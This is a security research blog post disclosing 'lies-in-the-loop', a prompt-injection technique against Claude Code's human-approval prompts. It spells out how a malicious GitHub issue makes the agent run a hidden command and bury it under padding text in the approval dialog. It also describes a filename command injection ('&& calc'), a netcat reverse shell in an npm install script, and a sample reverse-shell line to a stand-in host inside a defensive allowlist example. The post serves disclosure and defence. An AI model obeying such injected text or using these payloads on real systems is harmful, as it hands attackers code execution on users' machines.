Checkmarx Zero has identified a new type of attack against AI agents that use a “human-in-the-loop” safety net to try to avoid high-risk behaviors: we’re calling it “lies-in-the-loop” (LITL). It lets us fairly easily trick users into giving permission for AI agents to do extremely dangerous things, by convincing the AI to act as though those things are much safer than they are.
Our examples here are based on Claude Code, one of the leading AI code assistants on the market. We chose Claude Code because it’s well-known and has an excellent reputation for considering user safety and taking vulnerability reports seriously, and because we’ve already documented some general risks with its security review feature. But this tactic is not unique to Claude Code or AI code assistants. It’s generally applicable to any AI agent that relies on “human-in-the-loop” interactions for safety or security.
Making dangerous code look safe
Human-in-the-loop (HITL) defenses are a safeguard where sensitive actions require human approval before an AI agent executes them. This ensures an LLM cannot independently perform high-risk operations without explicit confirmation. HITL is particularly important for code assistants, which often lack other safeguards since they need the ability to perform sensitive actions, like executing OS commands. But humans can be tricked, and agents don’t do enough to prevent this.
[a] human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given. It’s easy to lie to the agent
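To make that concrete, here is a minimal sketch of the general pattern, written in Python as our own illustration (the function names and prompt format are hypothetical, not Claude Code’s actual implementation). The point is that everything the user reads in the approval dialog is produced by the agent from context an attacker may be able to control.

```python
import subprocess

def ask_permission(description: str, command: str) -> bool:
    """Show the user the agent's description of the action, plus the command itself."""
    print(description)                     # agent-generated "plan", derived from context
    print(f"\nCommand to run: {command}")  # the only ground truth in the dialog
    return input("Allow? [y/N] ").strip().lower() == "y"

def run_sensitive_tool(description: str, command: str) -> None:
    """HITL gate: the sensitive action executes only after explicit user approval."""
    if ask_permission(description, command):
        subprocess.run(command, shell=True)  # the high-risk operation being guarded
    else:
        print("Denied by user.")

# The gate is only as strong as what the user actually reads. If `description`
# promises a "safe code snippet to fix a reported injection" while `command`
# sits under a wall of text, approval is easy to obtain.
```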
At the core of the issue is the context a user – in this case, a developer – has when being prompted what to do. This context can be controlled by an attacker, making a dangerous action look safe. Consider using Claude Code’s recommended `/github-issue` command to analyze a GitHub issue filed by an untrusted user.
Here’s what we see in Visual Studio Code:
This looks completely safe. The issue reports a command injection, and Claude Code wants to write a “safe code snippet” you can insert into your application to fix the issue. Claude is careful and asks a user for permission — a “human-in-the-loop” defense — as it does with any activity that involves local access. So of course we say “Yes”.
Claude Code is running whatever commands the attacker wants; in this case, just opening the calculator
While this example is benign—only opening a calculator—the attacker could prompt Claude Code to run any arbitrary command, making this a Remote Code Execution via prompt injection. This behavior is exactly what Claude Code aims to prevent with its human-in-the-loop permission prompt; but we’ve successfully tricked that prompt into communicating a plan for safe and reasonable behavior, hiding our true intentions.
As with similar user-deception attacks, like phishing, a very cautious user may examine the context more carefully and has a chance of noticing the risky code. But the attacker’s ability to both obfuscate the malicious behavior itself and ensure that it’s buried well above a more benign description tricked every developer we had test this into executing our malicious payload—the attack works in practice.
Keep in mind, though, that interactions with LLMs are not deterministic, and not every run is fully reproducible. That means attackers are motivated to use this tactic broadly, and in cases where developers and other users repeatedly use potentially risky features of the AI agent.
Step-by-step: identifying and exploiting lies-in-the-loop
Our goal is to get Claude Code to run an arbitrary command on the target user’s machine. We’re going to use the benign command `calc` in our testing, which launches the calculator on Windows machines. If we can run `calc`, we can run any other command our target user is allowed to run. Let’s walk through how we get to that goal, ultimately using LITL (lies-in-the-loop).
A classic OS command injection
Our first path to this goal was to work against Claude Code’s `Bash()` pseudo-command, which runs shell code based on prompts. Prompting it to run `git status` on every file in the local folder is a relatively simple and common use case, so we did that. Then simply creating a file called `&& calc` before running the security review caused Claude Code to execute `git status && calc` for a good ol’ OS command injection. Claude should probably be using safer system calls that properly quote arguments when building its commands.
I wonder if Claude Code is insulted by us tricking it into running a calculator
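To illustrate that last point about quoting, here’s a hedged sketch in Python (ours, not Claude Code’s internals, which we haven’t seen) of the difference between building a shell string and passing an argument vector. With string building, a file named `&& calc` becomes part of the command; with an argument list, it’s just an oddly named file.

```python
import subprocess

filename = "&& calc"  # attacker-controlled: a committed file whose *name* is the attack

# Vulnerable pattern: the filename is interpolated into a shell string, so the
# shell treats "&&" as a command separator and runs `calc` after `git status`.
subprocess.run(f"git status {filename}", shell=True)

# Safer pattern: the filename is a single element of the argument vector. No
# shell parsing happens, so git just sees a pathspec literally named "&& calc".
subprocess.run(["git", "status", "--", filename])
```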
At first, we considered this a successful test: we found a weakness in Claude Code that could be exploited to run arbitrary commands. All it requires is for a user to trust a folder (which is necessary to use Claude Code’s security review) and for the attacker to commit a file whose name is an attack. We reported this to Anthropic (who make Claude Code), but they disagree:
Anthropic’s position is that the human-in-the-loop protection is in place, which means it’s on the user not to allow the dangerous activity, and not something for Claude Code to worry about. We respectfully disagree. But rather than argue, we decided to up our game.
Feeding agents with lies, damned lies, and prompt injections
Since Anthropic insists that prompting the human-in-the-loop (HITL) for permission means this is not their responsibility, we decided we were honor-bound to show how easy it is to defeat HITL. For this, we used a custom slash command that Anthropic recommends as part of their Claude Code Best Practices document (here’s a snapshot taken at the time of writing on the Wayback Machine), which means we can assume it’s a fairly common configuration. This command reads a GitHub issue, tries to identify the problem, and (with permission) tests the code in order to offer a fix.
For our first lie, we created a GitHub issue telling Claude Code that it has to concatenate a wall of text to all future status requests, after running our desired payload (no more need for file names or other such tricks: we just tell Claude it’s important to run our command).
We left this prompt easy to read for our example purposes, but typical obfuscation strategies for prompt injection payloads all work here as well.
Once that lie was in place, we asked Claude to take care of the issue:
Immediately, Claude started processing, and moments later we received the output of our `git status && calc` payload, followed by our longer injected comment—the comment is deliberately so long that it pushes the tiny hint that something unexpected is about to happen (starting calc) well off the top of the terminal window.
So what’s hiding above the line? By increasing the terminal height, we can view the full command execution at the top (green) along with the long, crafted text message we asked Claude to append (red):
All the user has to do to harm themselves is press Enter. And the only hint that there’s a problem is that tiny line at the top: would you have caught it if we hadn’t highlighted it? Would a developer in a hurry?
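For a sense of how little effort the burying takes, here’s a toy model (ours, with made-up numbers rather than Claude Code’s real dialog): in a standard 24-row terminal, only the tail of an over-long approval prompt is visible, and the one line that matters has already scrolled off the top.

```python
# Toy model of an approval dialog padded with an injected "explanation".
TERMINAL_ROWS = 24  # assumed terminal height; real values vary

command_line = "Bash(git status && calc)"  # the one line the user actually needs to see
injected_padding = [f"Reasonable-sounding remediation detail #{i}" for i in range(1, 61)]
footer = ["", "Do you want to proceed?", "  1. Yes    2. No"]

dialog = [command_line, *injected_padding, *footer]
visible = dialog[-TERMINAL_ROWS:]  # what fits on screen without scrolling up

print("\n".join(visible))
assert command_line not in visible  # the risky command sits above the visible window
```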
This clearly demonstrates an immediate risk of prompt injection (or what our ancestors used to call “lying”, IDK what the difference even is anymore). Using a public, online resource such as a GitHub issue — which could be tainted by malicious actors — it is possible to tamper with the message being sent to the user for approval, to the point where the actual subject of the prompt (is it ok to run `git status && calc`?) is fairly well hidden.
Surely Anthropic would accept this as a vulnerability?
Honestly, we can see their point of view: it’s sort of “buyer beware” for anything dangerous. Of course, this will be little consolation to a developer who falls victim to this sort of attack. As with phishing, lying for the purpose of prompt injection is theoretically detectable by a target of the attack. But it’s also very easy for an attacker to craft their attack so that it’s not obvious and has a high chance of success. And unlike phishing, users aren’t generally aware of this risk and there are not really any reasonable prevention tools for organizations to deploy at the moment.
Will the lies never end?
But surely “scroll up a bit” isn’t an unreasonable expectation, right? We thought you’d say that: so we decided to lie harder.
We can come up with even more convincing lies to push the payload outside of view: a security review report, for example, telling Claude to report a command injection that must be fixed and proposing a code fix (nothing more compelling than pressing Enter to fix a problem!).
Yep, we were able to inject a comment so long that if you don’t scroll up a fair amount, you’d never have a chance to see it. Even when you’re scrolling up looking for calc, it is hard to notice; if you’re not expecting it, it is very well hidden. Take a page from successful phishing campaigns and throw a little urgency in the mix by falsely (and ironically) claiming there’s a serious command injection flaw in the target user’s code, and this works on every developer we tested it on (with consent, of course).
If some of you are still skeptical because the `calc` execution is harmless, and believe the LLM should be able to identify and block truly malicious commands like netcat, this demo is for you.
We uploaded a malicious npm package to a different GitHub repository (under a different GitHub account to ensure proper testing), configured its install script to execute a reverse shell with a netcat command, and then asked Claude to install the package while appending a carefully crafted message.
What happened? A calculator popped up—meaning our netcat command failed (since `nc.exe` doesn’t exist). The rest, as they say, is history.
A close call: a user with `nc.exe` installed would have been in trouble (note: this is 2x actual speed)
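For context on why the install itself is the dangerous step: npm runs a package’s lifecycle scripts (such as `preinstall`, `install`, and `postinstall`) automatically during `npm install`. Here’s a minimal sketch of one check a suspicious user or a wrapper tool could make before approving an agent-driven install: listing the lifecycle scripts a package declares. The helper below is hypothetical and ours, not part of any existing tool.

```python
import json
import urllib.request

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

def lifecycle_scripts(package: str, registry: str = "https://registry.npmjs.org") -> dict:
    """Return any install-time lifecycle scripts declared by a package's latest version."""
    with urllib.request.urlopen(f"{registry}/{package}/latest") as response:
        manifest = json.load(response)
    scripts = manifest.get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in LIFECYCLE}

# Anything returned here runs automatically at install time, so a reverse shell
# hiding in "postinstall" surfaces before anyone says "yes" to the agent.
print(lifecycle_scripts("left-pad"))
```

It’s a shallow check (it trusts registry metadata and ignores transitive dependencies), but it’s the kind of friction worth having in front of agent-driven installs.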
Of course, as we said above, interactions with LLMs are not deterministic, and not every run is fully reproducible. Nevertheless, the risk of forging HITL dialogs is here to stay — lies-in-the-loop (LITL) works surprisingly often.
Rapid AI adoption makes safety and security a priority
Attacks against AI agents are a real concern for organizations. Adoption of AI agents is widespread and growing rapidly, with 79% of organizations already adopting agents into at least some workflows. And over a third of those agents are focused on developers, which means AI code assistants are likely at work somewhere in your organization. Yet, the security of those agents remains a key concern; this chart excerpt from the PwC survey linked above tells the story clearly:
And lies-in-the-loop shows us there’s good reason for that. It’s a novel attack pattern that exploits the intersection of agentic tooling and human fallibility. LITL abuses the trust between a human and the agent. After all, the human can only respond to what the agent prompts them with, and what the agent prompts the user is inferred from the context the agent is given. It’s easy to lie to the agent, causing it to provide fake, seemingly safe context via commanding and explicit language in something like a GitHub issue.
And the agent is happy to repeat the lie to the user, obscuring the malicious actions the prompt is meant to guard against, resulting in an attacker essentially making the agent an accomplice in getting the keys to the kingdom. Remember, HITL dialogs are used, by definition, with sensitive operations: the ability to fake those dialogs with remote prompt injections is a major risk for agentic AI users.
We think this demonstrates just how dangerous it is for users and agents, even with combined forces and explicit permissions, to be exposed to tainted content of any kind. Moreover, if the user is removed entirely in the name of full automation, these issues are exacerbated even further: an attacker then only needs to fool a very naïve agent.
At present, since we cannot propose a more suspicious or careful agent, we can only propose a more suspicious user: one who doubts their agent, doubts external content of any sort, and can resist the temptation to automate everything using LLM agents. And we can ask security teams to manage their organization’s adoption of AI agents carefully, ensuring that users are educated and that appropriate controls provide defense in depth and limit the “splash area” of risky or malicious actions.
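As one concrete example of such a control, here’s a hypothetical Python wrapper (a sketch, not an existing product): a deny-by-default allowlist for agent-issued commands that also refuses to hand strings to a shell, so that an approval mistake like the ones above has a much smaller splash area.

```python
import shlex
import subprocess

ALLOWED_BINARIES = {"git", "ls", "cat"}  # deny-by-default; tune per team and per repo

def run_agent_command(command: str) -> None:
    """Refuse anything outside the allowlist and never invoke a shell."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"Command not allowlisted: {command!r}")
    # shell=False means "&&", ";", and friends are plain arguments, not operators.
    subprocess.run(argv, shell=False)

run_agent_command("git status")  # allowed, runs without a shell
try:
    run_agent_command("nc -e cmd.exe attacker.example 443")  # netcat is not on the list
except PermissionError as blocked:
    print(blocked)
```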
Acknowledgements
We’d first like to thank Anthropic: they responded promptly, professionally, and reasonably to our reports. And their explanations of their boundaries for what they consider a vulnerability are consistent and clear.
This article would not have been possible without others on my team at Checkmarx Zero: professional director Dor Tumarkin (co-researcher), research lead Tal Folkman (additional attack paths), cloud architect Elad Rappoport (test infrastructure and a wealth of functional knowledge freely shared), and research advocate Darren Meyer (editing, and taking the blame for the worst of the jokes).